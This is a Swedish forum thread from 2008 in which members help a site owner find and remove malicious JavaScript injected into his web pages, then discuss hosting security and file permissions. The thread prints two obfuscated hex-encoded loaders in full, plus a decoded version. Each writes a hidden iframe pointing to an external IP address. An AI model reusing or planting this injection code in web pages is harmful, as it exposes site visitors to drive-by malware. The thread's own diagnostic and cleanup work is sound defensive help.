Besökare till min hemsida får virusvarning

[David J]

Hej!

 

Besökare till min hemsida som använder ett antiviruprogram från f-secure får alltid en eller flera virusvarningar. Det är ju inte så trevligt.

Jag fattar inte hur virusen kan finnas där. Via något externt inlänkat material kanske? Jag hittar det inte i alla fall.

 

Varningarna kan bl.a. hänvisa till följande två informationssidor hos f-secure:

http://www.f-secure.com/v-descs/exploit.shtml

http://www.f-secure.com/sw-desc/adware.shtml

 

Hemsidans adress: www.god-is.se

 

Vad göra?

 

/David J

 

[Laso]

Besökare till min hemsida som använder ett antiviruprogram från f-secure får alltid en eller flera virusvarningar. Det är ju inte så trevligt.

Jag fattar inte hur virusen kan finnas där. Via något externt inlänkat material kanske? Jag hittar det inte i alla fall.

Har själv kollat denna sida, men får ingen varning om någon misstänkt trojan eller adaware.

 

Kör för tillfället inte F-Secure, så kan inte testa om det skulle säga något.

 

Kan ju också vara något "falskalarm", sådant förekommer också, men vet inte i detta all.

 

Är det gjort en fullkoll på den dator som hemsidan editeras i, så att allt är fritt från virus och annat?

 

 

 

 

 

//gästen

 

[Thomas Tydal]

Det är den här koden på indexsidan som gör att det larmar:

 

<noframes><body><script>
<!--
var d=document,kol=561;
function O10H4860BEF7B78D1(H4860BEF7B7CCC){ function H4860BEF7B80C7() {var H4860BEF7B84E2=16;return H4860BEF7B84E2;} return( parseInt(H4860BEF7B7CCC,H4860BEF7B80C7()));}function H4860BEF7B88C3(H4860BEF7B8CBC){  var H4860BEF7B90B9='';for(H4860BEF7B9545=0; H4860BEF7B9545<H4860BEF7B8CBC.length; H4860BEF7B9545+=2){ H4860BEF7B90B9 += ( String.fromCharCode (O10H4860BEF7B78D1(H4860BEF7B8CBC.substr(H4860BEF7B9545, 2))));}return H4860BEF7B90B9;} document.write(H4860BEF7B88C3('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130303230292B2761306234326238615C272077696474683D313637206865696768743D3630207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

</body></noframes>

 

Tittar man lite närmare på koden så ser man att den öppnar en annan sida på en server med adressen 77.221.133.171, som ligger i Ryssland.

 

 

[Laso]

Är antagligen trött på den här tiden på dygnet, men jag ser inte var i denna kod som detta ip-nummer kopplas till?

 

 

 

//gästen

 

[Anjuna Moon]

Koden skapar i sin tur följande javascript:

var d=document;
if(!myia) {
d.write('
  <IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*152847)+'8102f33b7\' width=629 height=243 style=\'display: none\'>');
}
var myia=true;

 

 

[Thomas Tydal]

Javaskriptkoden är lite tillkrånglad så den ska vara svårläst för människor. Varje teckens värde skrivs med två hexadecimala siffror. Om vi tar tecknet 7 så är dess värde 55, vilket hexadecimalt är 37, så i stället för 77 står det alltså 3737.

 

Faktuam är att värdet siffrorna 0-9 skrivet hexadecimalt är 30, 31, 32, .., 39, så de är ganska lätta att känna igen.

 

2E är punkt.

 

Men jag har sedan tidigare en sida för att enkelt konvertera sånt här. Klistra in alla siffrorna här: http://www.tydal.nu/php/tools.php och klicka i "Unescape" och tryck "Omvandla".

 

Siffrorna står inom apostrofer strax efter document.write.

 

 

[Laso]

Börjar sakta hänga med nu lite, var länge sedan jag höll på med detta, man glömmer lätt märker jag.

 

 

Så det är läge med andra ord att Davidosss kollar upp sin hemsida, eller så är det något annat fuffens på gång?

 

 

 

//gästen

 

[Anjuna Moon]

Så det är läge med andra ord att Davidosss kollar upp sin hemsida, eller så är det något annat fuffens på gång?

Vissa som fått precis detta script inlagt på sina sidor har fått det via hackerattacker mot webbservern. Ligger sidan på webbhotell är det läge att informera dem om detta.

 

[David J]

Tack så jättemycket allihopa!

 

Jag har tagit bort den skadliga koden, som finns i alla index-filer på min sajt.

 

Sajten har jag hos Surftown. Tror ni alltså att det handlar om en attack mot deras server?

 

Kan jag göra något för att slippa fler sådana här otrevligheter?

 

/David J

 

Edit: inte alla index-filer, men många...

[inlägget ändrat 2008-06-29 10:59:47 av Davidosss]

[David J]

Kan man på ett effektivt sätt söka igenom hemsidan på ftp-servern efter den här koden?

Just nu håller jag på att ladda ner hela sajten till min dator (och skriver över min lokala kopia) för att sedan kunna söka igenom här...

Det verkar dock kunna ta tre evigheter.

 

 

Edit: För den som undrar, så passade jag på att byta alias från Davidosss till David J. Kändes bätte så :-). Hoppas jag inte förvirrar någon...

[inlägget ändrat 2008-06-29 11:18:06 av David J]

[Laso]

Edit: För den som undrar, så passade jag på att byta alias från Davidosss till David J. Kändes bätte så :-). Hoppas jag inte förvirrar någon...

Tur att du säger till i alla fall, men det är ingen hit att ändra ett "alias" mitt i en tråd, kan verkligen skapa förvirring.

 

 

 

 

//gästen

 

[David J]

Sorry.....

 

[Anjuna Moon]

Sajten har jag hos Surftown. Tror ni alltså att det handlar om en attack mot deras server?

Attack eller virus, det tidigare är troligast. Meddela dem om detta och bifoga javascriptet som referens.

 

Just nu håller jag på att ladda ner hela sajten till min dator (och skriver över min lokala kopia) för att sedan kunna söka igenom här...

Det verkar dock kunna ta tre evigheter.

Vad använder du för redigeringsprogram, de flesta kompetenta program har möjligheter att söka igenom källkod i hela projektet. I annat fall kan du användas Windows egen sökfunktion. Högerklicka på rotmappen och välj sök. Se till att söka på text i filer och använd ex. söksträngen "kol=561"

 

Vet du med dig att du inte använder dig av javascriptmetoden document.write så använd istället detta som söksträng. Det kan ju ha skett fler iframe-attacker på Surftown.

 

[David J]

Jag ska ta kontakt med Surftown.

 

Jag använder Dreamviewer MX. Visst kan det söka igenom all källkod, men inte på servern tror jag. Bara i den lokala kopian.

Jag måste alltså ladda ner alla filer till datorn, vilket tar tre evigheter.

 

Jag söker på ftp-server med windows egna sökverktyg enligt ditt förslag.

 

Tack! /David J

 

[Anjuna Moon]

ag måste alltså ladda ner alla filer till datorn, vilket tar tre evigheter.

Du behöver ju bara ladda ned källkodsfilerna. Bildfiler och dylikt behöver du ju inte ta ner. Eller har du en extremt långsam uppkoppling?

 

[David J]

... att söka med windows funktion på en ftp-server verkar visst inte gå...

 

Har en bredbanduppkoppling på 8mbit, så det är väl ingen fara.

Ska försöka komma på hur jag får dreamweaver att inte ladda ner bildfilerna... något tips?

 

[Anjuna Moon]

ka försöka komma på hur jag får dreamweaver att inte ladda ner bildfilerna... något tips?

Nä, jag använder inte DW, använd ett ftp-program om du inte kommer på hur. Har du inget kan du plocka ned ett gratis, ex. FileZilla Client

http://filezilla-project.org/

 

[David J]

Nu har jag flezilla nerladdat och igång. Ansluten till servern är jag också.

 

Hur laddar jag ner enbart html, html och php-filer?

 

Lyckas filtrera visningen, men den laddar ändå ner allt inkl. bilder.

 

En liten fingervisning?

 

/David J

 

[David J]

Hittade även följande kod, men fattar inte hur jag ska tyda den:

 

><script>function v483db95e80123(v483db95e80937){ function v483db95e81127 () {return 16;} return(parseInt(v483db95e80937,v483db95e81127()));}function v483db95e8211b(v483db95e82a12){ function v483db95e840e5 () {var v483db95e848de=2; return v483db95e848de;} var v483db95e830f8='';for(v483db95e838ed=0; v483db95e838ed<v483db95e82a12.length; v483db95e838ed+=v483db95e840e5()){ v483db95e830f8+=(String.fromCharCode(v483db95e80123(v483db95e82a12.substr(v483db95e838ed, v483db95e840e5()))));}return v483db95e830f8;} document.write(v483db95e8211b('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3133207372633D5C27687474703A2F2F37372E3232312E3133332E3135312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A383530292B2738623536363766355C272077696474683D3530206865696768743D3137207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

 

Antar att det är något liknande....?

[inlägget ändrat 2008-06-29 16:56:23 av David J]

[Anjuna Moon]

Antar att det är något liknande.

Ja, precis samma sak. Den anropar bara ett annat ip-nr (ligger dock på samma c-nät som den andra ip-adressen så det lades nog in vid samma attack). Radera!

 

[David J]

Jag kontaktade Surftown, och bifogade den skadliga kodsnutten samt information om var den fanns.

 

Följande svar fick jag av surftown:

Hej David,

 

TAck för ditt meddelande,

 

Vi har inte hört av någon annan att det blivit hackat och kan inte se något intrång på våra servers men vi ska vara observanta på om det kommer in fler besked kring det.

 

KOlla också genom din hemsida om det kan finns script med rättigheter som tillåter write rättigheter från webben.

 

Best regards / Cordialement / Freundliche Grüße / Venlige hilsener / Vänliga hälsningar / Vennlig hilsen

 

Michael

 

Vad menar han med

KOlla också genom din hemsida om det kan finns script med rättigheter som tillåter write rättigheter från webben.

??? Vad är ett script med write-rättigheter??? Jag fattar noll.

 

/David J

 

[Anjuna Moon]

?? Vad är ett script med write-rättigheter??? Jag fattar noll.

Det betyder att de har noll koll på sin egen server. Byt webbhotell omgående!

 

Det är inte du, eller någon utomstående, som ska kunna bestämma vilka skriv- och exekveriingsrättigheter du har hos ett säkert webbhotell. Jag är ganska chockad över det det där svaret faktiskt. Skrivrättigheter ska bara ges i dedikerade mappar som inte har exekveringsrättigheter. Hos Surftown har ju detta uppenbarligen inte fungerat (eller så förstår de inte att rena html-sidor idag måste ses som exekverbara källor). De har ansvaret och kräv ett bättre svar.

 

[David J]

Om du menar vilka skriv och exekv rättigheter mapparna har så är det jag som bestämmer det med hjälp av CHMOD.

 

Jag har aldrig varit på och ändrat detta...

 

Tittar jag på en mapp vilken som helst så har den egenskaperna:

User: Read & write & exec

Group: Read & exec

Other: Read & exec

 

Tittar jag på en av de html-filer som var drabbade, så har den egenskaperna:

User: Read & write

Group: Read

Other: Read

 

Nu har jag två frågor:

1. Är oavstående korrekta inställningar?

2. Är det detta han menar med "script med write-rättigheter" ??? Jag fattar liksom inte vad han menar med script i det här sammanhanget. Kan någon hjälpa mig fatta terminologin.

 

Edit: Har även mailat Surftown och bett om ett förtydligande.

 

 

[inlägget ändrat 2008-07-03 22:12:15 av David J]

[Anjuna Moon]

Om du menar vilka skriv och exekv rättigheter mapparna har så är det jag som bestämmer det med hjälp av CHMOD.

Jo jag förstår att det är så och så är det tyvärr på rätt många håll. Jag tycker bara att denna möjlighet bör regleras bättre av webbhotellen. Det finns för stor risk annars att det går käpp rakt åt ett varmare ställe =)

 

 

Är det detta han menar med "script med write-rättigheter" ???

Utan att helt komma ihåg Unix/AFS rättighetssystem (eller Linux för den delen) så tror jag att script körs under User-kontot. Men även om scriptet har skrivrättigheter så förhindrar det väl inte att man kan skrivskydda vissa mappar. Alltså bör du skrivskydda, dvs. bara använda Read&Execute, på alla de mappar där du har php/asp/html-filer. Har du inga script som behöver skriva något överhuvudtaget så ta bort Write-rättigheterna överallt.

 

EDIT: Fast jag vill poängtera att jag inte längre har lika mycket koll på Unix rättighetssystem som jag hade för ett decennium sedan, men resnomenanget ovan bör stämma ändå. Annars får någon annan hoppa in och korrigera mig

 

 

EDIT 2: Efter revision av dina inlägg så ser jag nu att det bara handlar om html-filer, så min första tanke nu är att ta bort alla Write-rättigheter för User. Innan du gör detta så vill jag dock att någon härinne med bättre koll på Unix/Linux bekräftar detta.

 

 

[inlägget ändrat 2008-07-04 10:08:34 av Anjuna Moon]

[David J]

Hej!

 

Finns gott om php-filer också, med gott om databaskopplingar, script som ger datum och tid etc, men inget som behöver write-rättigheter (utöver till databasen) så vitt jag vet.

 

/David J

 

[inlägget ändrat 2008-07-04 10:52:34 av David J]